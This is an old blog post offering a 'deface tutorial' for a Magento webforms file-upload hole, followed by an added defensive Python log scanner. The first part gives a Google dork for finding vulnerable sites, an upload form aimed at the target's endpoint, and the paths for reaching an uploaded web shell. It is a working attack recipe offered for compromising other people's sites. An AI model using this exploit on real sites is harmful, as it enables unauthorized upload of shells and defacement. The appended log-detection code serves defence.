Friday, 21 October 2016

Deface Tutorial: "Magento File Upload Vulnerability"


Dork: inurl:js/webforms/
Prof : /js/webforms/upload/index.php
Site Vuln : []

CSRF (save in Notepad as x.html)
<form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Check the resulting shell/txt

https://site.target.com/js/webforms/upload/files/[random]/urshell.php

Or https://site.target.com/js/webforms/upload/files/[random]/x.txt
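
For defenders, the request pattern described above (a POST to the uploader, then a request for a script under the files directory) can be searched for in web server access logs. This is an added example, not part of the original post; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths come from the post; the "combined" access-log format is an assumption.
UPLOAD_ENDPOINT = "/js/webforms/upload/index.php"
UPLOAD_DIR = "/js/webforms/upload/files/"
# Script extensions, including double extensions (x.php.jpg) and path-info (x.php/a).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|/|$)")
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return (ip, finding, path) for a request worth reviewing, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    # Drop the query string, decode percent-encoding, collapse repeated slashes.
    path = re.sub(r"/{2,}", "/", unquote(m["target"].split("?", 1)[0]))
    lower = path.lower()
    if m["method"] == "POST" and lower == UPLOAD_ENDPOINT:
        # The uploader also serves legitimate forms, so this is a lead, not proof.
        return (m["ip"], "upload-post", path)
    if lower.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(lower[len(UPLOAD_DIR):]):
        # Status 200 means the server answered for a script inside the upload tree.
        kind = "script-served" if m["status"] == "200" else "script-probe"
        return (m["ip"], kind, path)
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '203.0.113.7 - - [21/Oct/2016:10:01:02 +0000] "POST /js/webforms/upload/index.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Oct/2016:10:01:09 +0000] "GET /js/webforms/upload/files/ab12cd/sample.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Oct/2016:10:02:00 +0000] "GET /js/webforms/upload/files/ef34/x.txt HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Oct/2016:10:03:00 +0000] "GET /js/webforms/upload/files/ef34/a%2Ephtml?c=1 HTTP/1.1" 403 0 "-" "curl/7.50"',
    '198.51.100.4 - - [21/Oct/2016:10:04:00 +0000] "GET /js/webforms/form.js HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, kind, path in scan(SAMPLE):
        print(f"{kind:14} {ip:15} {path}")
```

A "script-served" finding from the same client shortly after an "upload-post" is the combination to investigate first; the upload directory should not serve executable scripts at all.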
